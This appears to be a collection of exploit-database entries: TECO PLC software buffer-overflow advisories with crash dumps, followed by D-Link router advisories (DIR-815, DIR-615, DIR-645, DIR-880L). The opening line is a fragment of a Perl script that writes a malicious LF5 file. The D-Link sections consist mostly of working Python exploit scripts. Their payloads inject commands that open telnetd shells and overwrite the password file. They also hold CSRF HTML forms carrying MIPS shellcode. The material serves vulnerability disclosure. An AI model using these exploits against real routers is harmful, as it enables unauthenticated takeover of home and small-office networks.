$header.$buffer; open($FILE,">$file"); print $FILE "$junk"; close($FILE); print "Malicious LF5 file created successfully!\n";
-
# TECO AP-PCLINK 1.094 TPC File Handling Buffer Overflow Vulnerability # # # Vendor: TECO Electric and Machinery Co., Ltd. # Product web page: http://www.teco-group.eu # Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9 # Affected version: 1.094 # # Summary: AP-PCLINK is the supportive software for TP03 or AP series, providing # three edit modes as LADDER, IL, FBDand SFC, by which programs can be input rapidly # and correctly. Every form written into the TP03 or AP series and AP-PCLINK can # be monitored in the form of the data. # # Desc: The vulnerability is caused due to a boundary error in the processing # of a project file, which can be exploited to cause a buffer overflow when a # user opens e.g. a specially crafted .TPC file. Successful exploitation could # allow execution of arbitrary code on the affected machine. # # --------------------------------------------------------------------------------- # Critical error detected c0000374 # (1950.ff0): Break instruction exception - code 80000003 (first chance) # eax=00000000 ebx=00000000 ecx=76f70b42 edx=0018d98d esi=00360000 edi=41414141 # eip=76fce725 esp=0018dbe0 ebp=0018dc58 iopl=0 nv up ei pl nz na po nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202 # ntdll!RtlpNtEnumerateSubKey+0x1af8: # 76fce725 cc int 3 # --------------------------------------------------------------------------------- # # Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit # Microsoft Windows 7 Ultimate SP1 (EN) 64bit # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2015-5278 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5278.php # # # 09.10.2015 # PoC: - http://zeroscience.mk/codes/aptpc-5278.zip - https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38703.zip
-
# TECO SG2 FBD Client 3.51 SEH Overwrite Buffer Overflow Vulnerability # # # Vendor: TECO Electric and Machinery Co., Ltd. # Product web page: http://www.teco-group.eu # Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9 # Affected version: 3.51 and 3.40 # # Summary: SG2 Client is a program that enables to create and edit applications. # The program is providing two edit modes, LADDER and FBD to rapidly and directly # input the required app. The Simulation Mode allows users to virtually run and test # the program before it is loaded to the controller. # # Desc: The vulnerability is caused due to a boundary error in the processing # of a Genie FBD, which can be exploited to cause a buffer overflow when a # user opens e.g. a specially crafted .GFB file. Successful exploitation could # allow execution of arbitrary code on the affected machine. # # --------------------------------------------------------------------------------- # (fb0.fd0): Access violation - code c0000005 (!!! second chance !!!) # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll - # *** WARNING: Unable to verify checksum for C:\Program Files (x86)\TECO\SG2 Client\FBD.EXE # *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\TECO\SG2 Client\FBD.EXE # eax=4141413f ebx=00000004 ecx=41414141 edx=41414141 esi=0018f578 edi=00a642e8 # eip=00440b57 esp=0018ef9c ebp=0000003f iopl=0 nv up ei pl nz na po nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 # FBD+0x40b57: # 00440b57 8995a0000000 mov dword ptr [ebp+0A0h],edx ss:002b:000000df=???????? # --------------------------------------------------------------------------------- # # Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit # Microsoft Windows 7 Ultimate SP1 (EN) 64bit # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2015-5276 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5276.php # # # 09.10.2015 # PoC: - http://zeroscience.mk/codes/sg2fbd-5276.zip - https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38701.zip
-
# TECO TP3-PCLINK 2.1 TPC File Handling Buffer Overflow Vulnerability # # # Vendor: TECO Electric and Machinery Co., Ltd. # Product web page: http://www.teco-group.eu # Affected version: 2.1 # # Summary: TP3-PCLINK Software is the supportive software for TP03, providing # three edit modes as LADDER, IL ,FBDand SFC, by which programs can be input # rapidly and correctly. # # Desc: The vulnerability is caused due to a boundary error in the processing # of a project file, which can be exploited to cause a buffer overflow when a # user opens e.g. a specially crafted .TPC file. Successful exploitation could # allow execution of arbitrary code on the affected machine. # # --------------------------------------------------------------------------------- # (794.193c): C++ EH exception - code e06d7363 (first chance) # Critical error detected c0000374 # (794.193c): Break instruction exception - code 80000003 (first chance) # eax=00000000 ebx=00000000 ecx=778f0b42 edx=0018db71 esi=02730000 edi=41414141 # eip=7794e725 esp=0018ddc4 ebp=0018de3c iopl=0 nv up ei pl nz na po nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202 # ntdll!RtlpNtEnumerateSubKey+0x1af8: # 7794e725 cc int 3 # --------------------------------------------------------------------------------- # # Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit # Microsoft Windows 7 Ultimate SP1 (EN) 64bit # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2015-5277 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5277.php # # # 09.10.2015 # PoC: - http://zeroscience.mk/codes/tp3tpc-5277.zip - https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38702.zip
-
## Advisory Information Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. ## Details Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import urllib import urllib2 # This exploits the auth_main.cgi with read buffer overflow exploit for v2.02 # prequisite is just to have id and password fields in params url = 'http://192.168.0.1/authentication.cgi' junk = "A"*1004+"B"*37+"\x58\xf8\x40\x00" # address of system function in executable junk+="X"*164+'echo "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA" values = "id=test&password=test&test="+junk req = urllib2.Request(url, values) response = urllib2.urlopen(req) the_page = response.read() ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct # format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address) buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"*286 buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0) buf+= "B"*20+"ZZZZ"+"telnetd -p 6778"+"C"*5 # adjustment to get to the right payload buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("1.2.3.4", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Command injection in ---------------------------------------------------------------------------------------------------------------------- import socket import struct # CSRF or any other trickery, but probably only works when connected to network I suppose buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.1", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley
-
## Advisory Information Title: Dlink DIR-615 Authenticated Buffer overflow in Ping and Send email functionality Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-615 -- Wireless N300 router from Dlink. Mainly used by home and small offices. ## Vulnerabilities Summary I have come across 2 security issues in DIR-615 firmware which allows an attacker using XSRF attack to exploit buffer overflow vulnerabilities in ping and send email functionality. ## Details # Ping buffer oberflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi"> <input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- <!-- reboot shellcode Big Endian MIPS--> <html> <body> <form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi"> <input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td> <input type=submit value="submit"> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley
-
## Advisory Information Title: Dlink DIR-645 UPNP Buffer Overflow Vendors contacted: William Brown <william.brown@dlink.com> (Dlink) Release mode: Released CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-645 -- Whole Home Router 1000 from Dlink. Mainly used by home and small offices. ## Vulnerabilities Summary I have come across 2 security issues in DIR-645 firmware which allows an attacker on wireless LAN and possibly WAN network to execute command injection and buffer overflow attack against the wireless router. I have provided exploit scripts written in python that give details of the exploits. The buffer overflow does not have a payload at this time, however if you watch the exploit in a debugger, then it can be clearly seen that the payload uses ROP techniques to get to stack payload which is a bunch of C's for now on the stack. It can be replaced with any payload that works on MIPS little endian architecture. ## Details # Command injection ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + 'test;telnetd -p 9656;test\r\n' + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- # Buffer overflow ---------------------------------------------------------------------------------------------------------------------- import socket import struct exploit_buffer = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.1\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";pt;"+"B"*158 exploit_buffer+="C"*50+"Z"*46 exploit_buffer+="\xb4\x67\xb3\x2a" exploit_buffer+="\xd0\xeb\xb4\x2a" exploit_buffer+="VVVV" a exploit_buffer+="\x7c\xba\xb1\x2a" exploit_buffer+="K"*16 exploit_buffer+="\x44\x3b\xb0\x2A" exploit_buffer+="A"*36 exploit_buffer+="\xf0\x5e\xb0\x2A" exploit_buffer+="H"*16 exploit_buffer+="C"*212+"\r\n" + "1\r\n\r\n" print "[+] sending exploit_bufferfer size", len(exploit_buffer) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.1", 80)) s.send(exploit_buffer) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown. * Feb 15, 2015: Vulnerability is patched by Dlink * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley
-
## Advisory Information Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities. Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins. ## Details Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Currently the address of exit function in libraray used as $PC buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220 buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "GET /webfa_authentication.cgi?id=" buf+="A"*408 buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack buf+="sh;#"+"CCCC"+"DDDD" #R0-R2 buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley